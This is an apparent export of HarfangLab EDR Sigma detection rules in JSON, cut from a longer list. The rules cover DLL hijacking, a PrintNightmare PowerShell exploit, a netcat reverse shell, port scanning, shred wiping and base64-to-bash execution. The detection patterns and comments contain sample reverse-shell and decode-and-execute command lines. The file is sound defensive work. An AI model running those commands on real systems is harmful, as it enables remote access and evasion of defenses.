"rule_id": "6df113cd-4125-42f2-b630-77bf2361c707",
"rule_name": "DLL Hijacking via register-cimprovider.exe",
"rule_description": "Detects potential Windows DLL Hijacking via register-cimprovider.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e045b70-4db3-4a16-8bf2-37ebd9f3cbb1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076279Z",
"creation_date": "2026-03-23T11:45:34.076281Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076285Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/calebstewart/CVE-2021-1675",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://attack.mitre.org/techniques/T1547/012/"
],
"name": "t1547_012_possible_printnightmare_exploit_using_powershell.yml",
"content": "title: Possible PrintNightmare Privilege Escalation Exploit via PowerShell\nid: 6e045b70-4db3-4a16-8bf2-37ebd9f3cbb1\ndescription: |\n Detects the usage PowerShell Proof-of-concept to exploit the PrintNightmare vulnerability (CVE-2021-1675).\n Attackers can use this print spooler vulnerability to locally elevate privileges on a target host.\n It is recommended to investigate all PowerShell activity related to spoolsv.exe processes and immediately apply Microsoft security patch KB5004945 while disabling the Print Spooler service on non-printing servers.\nreferences:\n - https://github.com/calebstewart/CVE-2021-1675\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://attack.mitre.org/techniques/T1547/012/\ndate: 2022/09/29\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1547.012\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.Script.PowerShell\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '$nightmare_data'\n - \"$winspool = $Types['winspool.drv']\"\n - 'function Invoke-Nightmare'\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e045b70-4db3-4a16-8bf2-37ebd9f3cbb1",
"rule_name": "Possible PrintNightmare Privilege Escalation Exploit via PowerShell",
"rule_description": "Detects the use of a PowerShell proof-of-concept that exploits the PrintNightmare vulnerability (CVE-2021-1675).\nAttackers can use this Print Spooler vulnerability to locally elevate privileges on a target host.\nIt is recommended to investigate all PowerShell activity related to spoolsv.exe processes and immediately apply Microsoft security patch KB5004945, while disabling the Print Spooler service on non-printing servers.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1547.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e3969d3-3c5c-4782-9b61-bf6789d64008",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618060Z",
"creation_date": "2026-03-23T11:45:34.618062Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618067Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://gtfobins.github.io/gtfobins/nc/",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_netcat_macos.yml",
"content": "title: Reverse Shell Executed via Netcat (macOS)\nid: 6e3969d3-3c5c-4782-9b61-bf6789d64008\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Netcat.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://gtfobins.github.io/gtfobins/nc/\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/11/14\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Netcat\n - classification.macOS.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n CommandLine|contains:\n # mknod /tmp/backpipe p; /bin/sh /tmp/backpipe\n # mknod /tmp/backpipe p; /bin/sh '\n - 'mknod *sh*<*|*nc *|*tee'\n # mknod /tmp/backpipe p; nc 192.168.56.1 8888 /tmp/backpipe\n - 'mknod *nc *<*|*sh*-i*|*tee'\n - 'mknod *nc *<*|*sh*-i*>'\n\n exclusion_homebrew:\n CommandLine|contains|all:\n - 'abort ?Homebrew is only supported on macOS and Linux.?'\n - '# On Linux, this script installs to /home/linuxbrew/.linuxbrew only'\n - 'https://docs.brew.sh/Homebrew-on-Linux'\n\n exclusion_httpd:\n CurrentDirectory: '/private/tmp/httpd-*'\n\n exclusion_kitten_ssh:\n CommandLine|contains: '# Copyright (C) 2022 Kovid Goyal '\n Image: '/usr/bin/ssh'\n ParentCommandLine|contains: 'kitten ssh'\n\n exclusion_munki:\n - Ancestors|contains: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e3969d3-3c5c-4782-9b61-bf6789d64008",
"rule_name": "Reverse Shell Executed via Netcat (macOS)",
"rule_description": "Detects a suspicious command line related to a reverse shell execution via Netcat.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shells to bypass firewall restrictions.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-09-25",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e62da17-4a00-4116-8c84-f1a3ddd01757",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091533Z",
"creation_date": "2026-03-23T11:45:34.091535Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091539Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/"
],
"name": "t1204_harfanglab_eicar_linux.yml",
"content": "title: Harfanglab EICAR (Linux)\nid: 6e62da17-4a00-4116-8c84-f1a3ddd01757\ndescription: |\n This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\n EICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\n This does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\n If this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\nreferences:\n - https://attack.mitre.org/techniques/T1204/\ndate: 2023/11/30\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Malware.EICAR\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: 'EICAR-STANDARD-HARFANGLAB-TEST-STRING'\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e62da17-4a00-4116-8c84-f1a3ddd01757",
"rule_name": "Harfanglab EICAR (Linux)",
"rule_description": "This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command line of a process.\nEICAR files were originally used to test the response of antivirus (AV) programs. HarfangLab has used this concept to create a test rule for its EDR.\nThis does not represent inherently malicious activity, and there should be no need for investigation if these tests are expected in your environment.\nIf this rule has triggered, it means that the HarfangLab EDR detection engines are operating properly.\n",
"rule_creation_date": "2023-11-30",
"rule_modified_date": "2025-01-27",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e759997-33d8-452a-8ead-44744fab7782",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099042Z",
"creation_date": "2026-03-23T11:45:34.099044Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099049Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_disksnapshot.yml",
"content": "title: DLL Hijacking via disksnapshot.exe\nid: 6e759997-33d8-452a-8ead-44744fab7782\ndescription: |\n Detects potential Windows DLL Hijacking via disksnapshot.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'disksnapshot.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\cryptsp.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e759997-33d8-452a-8ead-44744fab7782",
"rule_name": "DLL Hijacking via disksnapshot.exe",
"rule_description": "Detects potential Windows DLL Hijacking via disksnapshot.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e840fce-0f8e-4009-8180-c6e416c31634",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604991Z",
"creation_date": "2026-03-23T11:45:34.604995Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605002Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_powershell_port_list.yml",
"content": "title: Port Scan via PowerShell\nid: 6e840fce-0f8e-4009-8180-c6e416c31634\ndescription: |\n Detects PowerShell using the System.Net.Sockets.TcpClient class to scan for outbound ports.\n Attackers can use PowerShell to perform a port scan instead of using common tools such as Nmap, since PowerShell is built into Windows operating systems.\n It is recommended to verify if the PowerShell script is using this class legitimately. If so, it is recommended to create a whitelist for the identified script.\nreferences:\n - https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/\n - https://attack.mitre.org/techniques/T1016/\ndate: 2021/10/19\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.NetworkScan\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'New-Object'\n - 'System.Net.Sockets.TcpClient'\n - 'BeginConnect'\n - 'Connected'\n\n exclusion_vmware:\n PowershellScriptPath: '?:\\Program Files\\WindowsPowerShell\\Modules\\VMware.Sdk.Runtime\\\\*\\Extensions\\PowerShellCmdletsExtensions.ps1'\n PowershellCommand|contains|all:\n - 'A wrapper function for Invoke-WebRequest which gets content from a web page on the internet.'\n - 'function Invoke-WebRequestX {'\n - 'Retrieves the Certificate thumbprint for the specified remote host. Tcp and Ssl streams are used.'\n - 'function Get-TlsCertificateThumbprintFromRemoteHost {'\n\n # https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/run-analyzer-windows\n exclusion_MDEClientAnalyzer:\n PowershellScriptPath|contains: 'MDEClientAnalyzer.ps1'\n PowershellCommand|contains|all:\n - '# This telnet test does not support proxy as-is'\n - 'Successfully connected to Host: $RemoteHost on Port: $Port'\n - 'function Write-ReportEvent('\n\n exclusion_test_port:\n PowershellCommand|contains|all:\n - 'function Test-Port'\n - 'https://boeprox.wordpress.org'\n - 'A. A. Milne (1882-1958)'\n - '#Create object for connecting to port on computer'\n\n exclusion_manageegine:\n ProcessParentImage|endswith: '\\ManageEngine\\M365 Manager Plus\\bin\\wrapper.exe'\n\n exclusion_m365_manager:\n ProcessImage: '?:\\ManagerEngine\\M365 Manager Plus\\jre\\bin\\java.exe'\n\n exclusion_vmware_sdk:\n PowershellScriptPath|contains: 'VMware.Sdk.Runtime\\Extensions\\PowerShellCmdletsExtensions.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e840fce-0f8e-4009-8180-c6e416c31634",
"rule_name": "Port Scan via PowerShell",
"rule_description": "Detects PowerShell using the System.Net.Sockets.TcpClient class to scan for outbound ports.\nAttackers can use PowerShell to perform a port scan instead of using common tools such as Nmap, since PowerShell is built into Windows operating systems.\nIt is recommended to verify if the PowerShell script is using this class legitimately. If so, it is recommended to create a whitelist for the identified script.\n",
"rule_creation_date": "2021-10-19",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e9abccd-a3c5-4c22-9f68-1657dd47857b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080987Z",
"creation_date": "2026-03-23T11:45:34.080989Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080994Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_ngen.yml",
"content": "title: Ngen.exe Sacrificial Process Spawned\nid: 6e9abccd-a3c5-4c22-9f68-1657dd47857b\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary ngen.exe, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as a sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used, for instance, by the Vidar malware.\n It is recommended to investigate the parent process performing this action and the destination IP address of the ngen.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SacrificialProcess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\ngen.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e9abccd-a3c5-4c22-9f68-1657dd47857b",
"rule_name": "Ngen.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary ngen.exe, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used, for instance, by the Vidar malware.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the ngen.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6eae8f6d-99fb-45f9-a55d-94fc7e7110df",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628372Z",
"creation_date": "2026-03-23T11:45:34.628374Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628378Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/shred.1.html",
"https://attack.mitre.org/techniques/T1070/004/",
"https://attack.mitre.org/techniques/T1485/"
],
"name": "t1485_execution_of_shred.yml",
"content": "title: Shred Execution\nid: 6eae8f6d-99fb-45f9-a55d-94fc7e7110df\ndescription: |\n Detects the execution of shred, a command to overwrite a file with random data to hide its content.\n Attackers can overwrite any files left by their malicious activities to prevent forensic analysis and slow the investigation process.\n It is recommended to analyze the process responsible for this action to look for malicious content or other malicious actions.\nreferences:\n - https://man7.org/linux/man-pages/man1/shred.1.html\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/techniques/T1485/\ndate: 2023/01/06\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.impact\n - attack.t1485\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Shred\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.Obfuscation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/shred'\n\n selection_space:\n CommandLine|contains:\n - ' - u'\n - ' -? u'\n - ' -?? u'\n\n # This is handled by the rule 0d4bd1c5-18a6-4c6e-a08e-48adc41e2884\n filter_delete:\n CommandLine|contains:\n - ' -u'\n - ' -?u'\n - ' -??u'\n - ' -???u'\n\n exclusion_ansible:\n ProcessParentName: 'ansible-vault'\n\n condition: selection and (selection_space or not 1 of filter_*) and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6eae8f6d-99fb-45f9-a55d-94fc7e7110df",
"rule_name": "Shred Execution",
"rule_description": "Detects the execution of shred, a command to overwrite a file with random data to hide its content.\nAttackers can overwrite any files left by their malicious activities to prevent forensic analysis and slow the investigation process.\nIt is recommended to analyze the process responsible for this action to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2023-01-06",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ec3565f-e7af-4e69-8d88-56a67f183e86",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095300Z",
"creation_date": "2026-03-23T11:45:34.095302Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095307Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1059_004_base64_bash_execution.yml",
"content": "title: Inline Base64 Content Execution via Bash\nid: 6ec3565f-e7af-4e69-8d88-56a67f183e86\ndescription: |\n Detects the execution of base64 encoded content in bash.\n Adversaries may use base64 to hide a malicious payload and evade security defenses.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2024/10/18\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.command_and_control\n - attack.t1132.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Obfuscation\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n # /bin/zsh -c “echo -e WFVNS2JXNnNTM3c9J3RtcD0iJChta3R | base64 -D | /bin/bash\n Image|endswith:\n - '/bash'\n - '/zsh'\n - '/sh'\n # use regexp to eliminate multi-line script\n CommandLine|re: '^.*base64 +(-d|-D|--decode).*\\|.*sh$'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ec3565f-e7af-4e69-8d88-56a67f183e86",
"rule_name": "Inline Base64 Content Execution via Bash",
"rule_description": "Detects the execution of base64 encoded content in bash.\nAdversaries may use base64 to hide a malicious payload and evade security defenses.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n",
"rule_creation_date": "2024-10-18",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1132.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ecb6616-ffe0-4bb5-a3bf-ea85b57b9fab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
